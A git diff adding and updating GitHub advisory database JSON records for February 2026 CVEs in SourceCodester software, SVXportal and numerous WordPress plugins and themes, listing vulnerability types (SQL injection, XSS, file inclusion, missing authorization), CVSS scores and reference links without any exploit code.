diff --git a/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json b/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json
new file mode 100644
index 0000000000000..12920820315dd
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5xcj-44v8-p2v3/GHSA-5xcj-44v8-p2v3.json
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5xcj-44v8-p2v3", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2848" + ], + "details": "A flaw has been found in SourceCodester Simple Responsive Tourism Website 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=register of the component Registration. This manipulation of the argument Username causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2848" + }, + { + "type": "WEB", + "url": "https://github.com/anupeng/CVE/issues/1" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347084" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347084" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753967" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5xr7-h2jm-xhr2/GHSA-5xr7-h2jm-xhr2.json b/advisories/unreviewed/2026/02/GHSA-5xr7-h2jm-xhr2/GHSA-5xr7-h2jm-xhr2.json new file mode 100644 index 0000000000000..5d77534fde10f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5xr7-h2jm-xhr2/GHSA-5xr7-h2jm-xhr2.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5xr7-h2jm-xhr2", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69063" + ], + "details": "Missing Authorization vulnerability in Saad Iqbal New User Approve new-user-approve allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects New User Approve: from n/a through <= 3.2.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69063" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/new-user-approve/vulnerability/wordpress-new-user-approve-plugin-3-2-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json b/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json new file mode 100644 index 0000000000000..fcd99fa694ca1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6262-6vhm-9x8v/GHSA-6262-6vhm-9x8v.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6262-6vhm-9x8v", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24948" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Reflector reflector-plugins allows Reflected XSS.This issue affects Reflector: from n/a through <= 1.2.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24948" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/reflector-plugins/vulnerability/wordpress-reflector-plugin-1-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json b/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json new file mode 100644 index 0000000000000..1ba5359ab6e42 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-62hw-x3qq-c7vv/GHSA-62hw-x3qq-c7vv.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-62hw-x3qq-c7vv", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-27506" + ], + "details": "SVXportal version 2.5 and prior contain a stored cross-site scripting vulnerability in the user profile update workflow (user_settings.php submitting to admin/update_user.php). Authenticated users can store malicious HTML/JavaScript in fields such as Firstname, lastname, email, and image_url, which are later rendered without adequate output encoding in the administrator interface (admin/users.php), resulting in JavaScript execution in an administrator's browser when the affected page is viewed.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27506" + }, + { + "type": "WEB", + "url": "https://github.com/sa2blv/SVXportal/blob/master/admin/update_user.php" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/svxportal-admin-update-user-php-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-62jc-vj7m-2q9x/GHSA-62jc-vj7m-2q9x.json b/advisories/unreviewed/2026/02/GHSA-62jc-vj7m-2q9x/GHSA-62jc-vj7m-2q9x.json new file mode 100644 index 0000000000000..de869971bb63d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-62jc-vj7m-2q9x/GHSA-62jc-vj7m-2q9x.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-62jc-vj7m-2q9x", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22363" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Rhodos rhodos allows PHP Local File Inclusion.This issue affects Rhodos: from n/a through <= 1.3.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22363" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/rhodos/vulnerability/wordpress-rhodos-theme-1-3-3-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-62mp-mc96-vv2w/GHSA-62mp-mc96-vv2w.json b/advisories/unreviewed/2026/02/GHSA-62mp-mc96-vv2w/GHSA-62mp-mc96-vv2w.json new file mode 100644 index 0000000000000..7af2dbb8ac7a0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-62mp-mc96-vv2w/GHSA-62mp-mc96-vv2w.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-62mp-mc96-vv2w", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69303" + ], + "details": "Missing Authorization vulnerability in modeltheme ModelTheme Framework modeltheme-framework allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ModelTheme Framework: from n/a through <= 1.9.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69303" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/modeltheme-framework/vulnerability/wordpress-modeltheme-framework-plugin-1-9-2-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-63pr-8qvw-vfv9/GHSA-63pr-8qvw-vfv9.json b/advisories/unreviewed/2026/02/GHSA-63pr-8qvw-vfv9/GHSA-63pr-8qvw-vfv9.json new file mode 100644 index 0000000000000..775e02a6e6706 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-63pr-8qvw-vfv9/GHSA-63pr-8qvw-vfv9.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-63pr-8qvw-vfv9", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68023" + ], + "details": "Missing Authorization vulnerability in Addonify Addonify – Compare Products For WooCommerce addonify-compare-products allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Addonify – Compare Products For WooCommerce: from n/a through <= 1.1.17.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68023" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/addonify-compare-products/vulnerability/wordpress-addonify-compare-products-for-woocommerce-plugin-1-1-17-settings-change-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json b/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json new file mode 100644 index 0000000000000..09c5bcebbaacf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-63v8-38hf-jrfm", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69392" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in itex iMoney imoney allows Reflected XSS.This issue affects iMoney: from n/a through <= 0.36.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69392" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/imoney/vulnerability/wordpress-imoney-plugin-0-36-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6562-26mh-56xr/GHSA-6562-26mh-56xr.json b/advisories/unreviewed/2026/02/GHSA-6562-26mh-56xr/GHSA-6562-26mh-56xr.json new file mode 100644 index 0000000000000..38956b4b5bb5f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6562-26mh-56xr/GHSA-6562-26mh-56xr.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6562-26mh-56xr", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69387" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in whatwouldjessedo Simple Retail Menus simple-retail-menus allows PHP Local File Inclusion.This issue affects Simple Retail Menus: from n/a through <= 4.2.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69387" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/simple-retail-menus/vulnerability/wordpress-simple-retail-menus-plugin-4-2-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-66q7-4wcm-7r85/GHSA-66q7-4wcm-7r85.json b/advisories/unreviewed/2026/02/GHSA-66q7-4wcm-7r85/GHSA-66q7-4wcm-7r85.json new file mode 100644 index 0000000000000..e70563b0aac3c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-66q7-4wcm-7r85/GHSA-66q7-4wcm-7r85.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-66q7-4wcm-7r85", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22354" + ], + "details": "Deserialization of Untrusted Data vulnerability in Dotstore Woocommerce Category Banner Management banner-management-for-woocommerce allows Object Injection.This issue affects Woocommerce Category Banner Management: from n/a through <= 2.5.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22354" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/banner-management-for-woocommerce/vulnerability/wordpress-woocommerce-category-banner-management-plugin-2-5-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6c3h-gxfp-37vm/GHSA-6c3h-gxfp-37vm.json b/advisories/unreviewed/2026/02/GHSA-6c3h-gxfp-37vm/GHSA-6c3h-gxfp-37vm.json index 0903674e21afe..3fd12c85e8604 100644 --- a/advisories/unreviewed/2026/02/GHSA-6c3h-gxfp-37vm/GHSA-6c3h-gxfp-37vm.json +++ b/advisories/unreviewed/2026/02/GHSA-6c3h-gxfp-37vm/GHSA-6c3h-gxfp-37vm.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6c3h-gxfp-37vm", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-23547" ], "details": "Missing Authorization vulnerability in cmsmasters CMSMasters Content Composer cmsmasters-content-composer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CMSMasters Content Composer: from n/a through <= 2.5.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:12Z" diff --git a/advisories/unreviewed/2026/02/GHSA-6frj-85f5-897h/GHSA-6frj-85f5-897h.json b/advisories/unreviewed/2026/02/GHSA-6frj-85f5-897h/GHSA-6frj-85f5-897h.json new file mode 100644 index 0000000000000..658dcc6e56cbf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6frj-85f5-897h/GHSA-6frj-85f5-897h.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6frj-85f5-897h", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69397" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Tint tint allows PHP Local File Inclusion.This issue affects Tint: from n/a through <= 1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69397" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/tint/vulnerability/wordpress-tint-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6fwh-vwxr-5jrw/GHSA-6fwh-vwxr-5jrw.json b/advisories/unreviewed/2026/02/GHSA-6fwh-vwxr-5jrw/GHSA-6fwh-vwxr-5jrw.json new file mode 100644 index 0000000000000..f1f59267b39a9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6fwh-vwxr-5jrw/GHSA-6fwh-vwxr-5jrw.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fwh-vwxr-5jrw", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67974" + ], + "details": "Missing Authorization vulnerability in WP Legal Pages WPLegalPages wplegalpages allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPLegalPages: from n/a through <= 3.5.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67974" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wplegalpages/vulnerability/wordpress-wplegalpages-plugin-3-5-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6g49-x6hq-6rmq/GHSA-6g49-x6hq-6rmq.json b/advisories/unreviewed/2026/02/GHSA-6g49-x6hq-6rmq/GHSA-6g49-x6hq-6rmq.json new file mode 100644 index 0000000000000..8d93ed6da314b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6g49-x6hq-6rmq/GHSA-6g49-x6hq-6rmq.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6g49-x6hq-6rmq", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68000" + ], + "details": "Missing Authorization vulnerability in PickPlugins Testimonial Slider testimonial allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Testimonial Slider: from n/a through <= 2.0.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68000" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/testimonial/vulnerability/wordpress-testimonial-slider-plugin-2-0-15-broken-access-control-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6qvx-865f-qrhf/GHSA-6qvx-865f-qrhf.json b/advisories/unreviewed/2026/02/GHSA-6qvx-865f-qrhf/GHSA-6qvx-865f-qrhf.json new file mode 100644 index 0000000000000..85be695dfdd6e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6qvx-865f-qrhf/GHSA-6qvx-865f-qrhf.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6qvx-865f-qrhf", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:32Z", + "aliases": [ + "CVE-2024-34438" + ], + "details": "Missing Authorization vulnerability in Anssi Laitila Shared Files shared-files.This issue affects Shared Files: from n/a through <= 1.7.19.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34438" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/shared-files/vulnerability/wordpress-shared-files-plugin-1-7-19-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:21:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6rr6-99p5-684x/GHSA-6rr6-99p5-684x.json b/advisories/unreviewed/2026/02/GHSA-6rr6-99p5-684x/GHSA-6rr6-99p5-684x.json new file mode 100644 index 0000000000000..aebd5a2dc6802 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6rr6-99p5-684x/GHSA-6rr6-99p5-684x.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6rr6-99p5-684x", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2024-50452" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in POSIMYTH Nexter Blocks the-plus-addons-for-block-editor allows Stored XSS.This issue affects Nexter Blocks: from n/a through <= 3.3.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50452" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/the-plus-addons-for-block-editor/vulnerability/wordpress-nexter-blocks-plugin-3-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json b/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json new file mode 100644 index 0000000000000..e91bfff082e87 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6v87-78cw-pw29", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22351" + ], + "details": "Missing Authorization vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP FullCalendar: from n/a through <= 1.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22351" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-fullcalendar/vulnerability/wordpress-wp-fullcalendar-plugin-1-6-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6vfc-pv6m-f4jg/GHSA-6vfc-pv6m-f4jg.json b/advisories/unreviewed/2026/02/GHSA-6vfc-pv6m-f4jg/GHSA-6vfc-pv6m-f4jg.json index 22490fbb5c908..3c813c93a0a2e 100644 --- a/advisories/unreviewed/2026/02/GHSA-6vfc-pv6m-f4jg/GHSA-6vfc-pv6m-f4jg.json +++ b/advisories/unreviewed/2026/02/GHSA-6vfc-pv6m-f4jg/GHSA-6vfc-pv6m-f4jg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6vfc-pv6m-f4jg", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-25420" ], "details": "Missing Authorization vulnerability in MailerLite MailerLite official-mailerlite-sign-up-forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MailerLite: from n/a through <= 1.7.18.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [], "references": [ { 
@@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:23Z" diff --git a/advisories/unreviewed/2026/02/GHSA-733c-qhrf-7cmm/GHSA-733c-qhrf-7cmm.json b/advisories/unreviewed/2026/02/GHSA-733c-qhrf-7cmm/GHSA-733c-qhrf-7cmm.json new file mode 100644 index 0000000000000..0922151bc195c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-733c-qhrf-7cmm/GHSA-733c-qhrf-7cmm.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-733c-qhrf-7cmm", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67981" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Besa besa allows PHP Local File Inclusion.This issue affects Besa: from n/a through <= 2.3.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67981" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/besa/vulnerability/wordpress-besa-theme-2-3-15-local-file-inclusion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-752x-86hx-w73c/GHSA-752x-86hx-w73c.json b/advisories/unreviewed/2026/02/GHSA-752x-86hx-w73c/GHSA-752x-86hx-w73c.json new file mode 100644 index 0000000000000..3fb7255f7d34d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-752x-86hx-w73c/GHSA-752x-86hx-w73c.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-752x-86hx-w73c", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22344" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes FiveStar fivestar allows PHP Local File Inclusion.This issue affects FiveStar: from n/a through <= 1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22344" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/fivestar/vulnerability/wordpress-fivestar-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7689-4fm5-8xxm/GHSA-7689-4fm5-8xxm.json b/advisories/unreviewed/2026/02/GHSA-7689-4fm5-8xxm/GHSA-7689-4fm5-8xxm.json new file mode 100644 index 0000000000000..067d08dfc2d2b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7689-4fm5-8xxm/GHSA-7689-4fm5-8xxm.json 
